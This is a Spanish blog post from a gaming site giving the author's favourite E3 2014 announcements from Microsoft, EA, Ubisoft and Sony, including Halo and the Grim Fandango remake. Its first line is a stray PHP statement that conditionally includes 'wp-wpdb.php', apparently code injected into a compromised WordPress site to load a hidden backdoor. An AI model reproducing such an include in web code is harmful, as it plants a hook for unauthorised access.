if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Lo mejor del E3 2014 de Microsoft, EA, Ubisoft y Sony – La Fortaleza de LeChuck

Lo mejor del E3 2014 de Microsoft, EA, Ubisoft y Sony

Después de la pasada edición del E3 con la presentación de las consolas nextgen, la exaltación de su parte social y la escasez de juegos, por fin en esta edición comienzan a ver la luz títulos destacables que aterrizarán este año y otros tantos en 2015. Esto ha sido para mí lo mejor del primer día del E3.

grim_fandango_remake

La conferencia de Microsoft fue la que gozó de un ritmo más ágil, y mostró un juego tras otro, dejando atrás la parte social tan soporífera a la que nos tiene acostumbrados. Por otro lado, Kinect, fue el gran desaparecido y solo tuvo su minuto de gloria con Dance Central 2014. Xbox One sin Kinect era algo que muchos habíamos demandado desde el primer día, y semanas antes del E3, Microsoft se rindió y anunció la llegada de packs de Xbox One a menor precio sin el periférico. Se anunciaron muchos juegos durante la conferencia, aunque pocos exclusivos, pero entre ellos estaba el esperado Halo 5: Guardians, del cual pudimos ver un nuevo tráiler multijugador. Sin embargo, el bombazo fue la recopilación Halo: Master Chief Collection para Xbox One, que incluye Halo Combat Evolved, Halo 2, Halo 3 y Halo 4, remasterizados todos ellos en HD, a 1080p y 60 FPS. Además, todos ellos cuentan con su multijugador y servidores dedicados, ¡podremos rememorar los buenos tiempos de la saga! Por si esto fuera poco, Halo: Master Chief Collection dispone de un acceso exclusivo para la beta de Halo 5: Guardians que llegará en diciembre, como anticipo del estreno de Halo 5 en 2015. El tráiler del jefe maestro me dejó sin aliento:

Una agradable sorpresa fue Ori and the Blind Forest de Moon Studios, un juego de acción/aventura que recuerda a las películas de Studio Ghibli, y donde su historia nos llegará a lo más profundo. Esta preciosa experiencia, exclusiva de Microsoft, estará disponible en otoño de este año.

Lo último a destacar de la conferencia de Microsoft es el nuevo Tomb Raider llamado Rise of the Tomb Raider. Tras el éxito del reborn, parece que la joven Lara Croft ha venido para quedarse. En líneas generales, estoy satisfecha de la conferencia y, como expresé en mi twitter, todo lo negativo de Xbox One ha ido desapareciendo. Ahora veo la compra de una Xbox One más cerca.

La conferencia de Electronic Arts era la próxima y tan solo esperaba dos cosas: que me convencieran con Dragon Age: Inquisition y ver un teaser de Mass Effect 4. Bien, sobre Dragon Age: Inquisition, se mostró un gameplay y tráiler, donde se apreciaba el sistema de combate, que confirmaba definitivamente lo inevitable: Action RPG. Una guerrera asestaba golpes con su espada en las patas traseras del dragón y no pude evitar acordarme en ese momento en Dark Souls. He visto en demos posteriores que es posible pausar el juego y preparar la estrategia, pero tengo el presentimiento de que no será necesario para vencer al enemigo. En fin, Bioware ya amenazó con grandes cambios que van a destruir la esencia del maravilloso Dragon Age: Origins y otros juegos clásicos de Bioware. Tan solo espero que la historia al menos sea digna, aunque no puedo evitar sentirme desilusionada.

Por fin llegó Mass Effect 4 para subir la moral. Fueron 2 minutos de concept arts en un video con los responsables comentando el proceso. Muy poco de todo, pero de fondo sonaba Vigil y New Worlds y los escalofríos recorrieron mi cuerpo. Muchas promesas de sus creadores y esperanza de los fans por recorrer de nuevo la galaxia y conocer nuevas especies, compañeros y amigos.

Ubisoft hace tiempo que no tiene nada que llame especialmente mi atención, salvo ayer, que mostró un juego con una estética muy peculiar situado en la época de la primera guerra mundial, su nombre es Valiant Hearts: The Great War. El juego está inspirado en las cartas escritas durante la Primera Guerra Mundial y gira en torno a cinco extraños que participan en la contienda de formas diferentes. Valiant Hearts: The Great War es un juego de puzles y acción con una historia sobre la supervivencia, el sacrificio y la amistad que llegará este mismo año para PC, Xbox 360, PS3 y PS4.

Ubisoft me dejó anestesiada y no me quedé a la conferencia de Sony, pero al día siguiente, cuando me levanté, tenía mensajes de: GRIM FANDANGO REMAKE y tuve que frotarme los ojos para ver si había leído bien. Señores y señoras, volveremos a ver Grim Fandango de la mano de Sony para PS4 y PS Vita. Pero no os preocupéis aventureros clásicos, Tim Schafer, desde su Twitter, indica que seguramente llegue a otras plataformas, porque los aventureros sabemos que donde realmente se disfruta de una buena aventura gráfica es en un PC.

Es increíble que haya tenido que venir Sony a hacer resurgir un clásico de este calibre, pero sin duda es una estupenda noticia y prácticamente lo mejor de la conferencia de Sony. Echad un vistazo al divertido anuncio del remake de Grim Fandango:

Los grandes olvidados han sido The Last Guardian, que no hay ni rastro de él desde hace 5 años, y Red Dead Redemption 2, del que esperaba algo, aunque fuera una mísera imagen en pantalla. Esto es todo lo que especialmente me gustó del primer dia del E3, pero aún queda el Nintendo Direct especial E3, y quien sabe, quizá Nintendo saque todo lo que tiene en la recámara y sorprenda a más de uno. Pero eso ya es otra historia y será narrada por el Nintendero del blog, el señor Museboy.

Publicada el
Categorizado como Opinión Etiquetado como

Por Arashi

Aparte de patear traseros de piratas como gobernadora en Mêlée, soy una fanática de los videojuegos desde que de pequeña me regalaron la Atari 2600. Adoro las aventuras gráficas y los RPG, pero no le hago ascos al resto. Otra de mis pasiones es todo lo relacionado con Japón.

3 comentarios

Dejar un comentario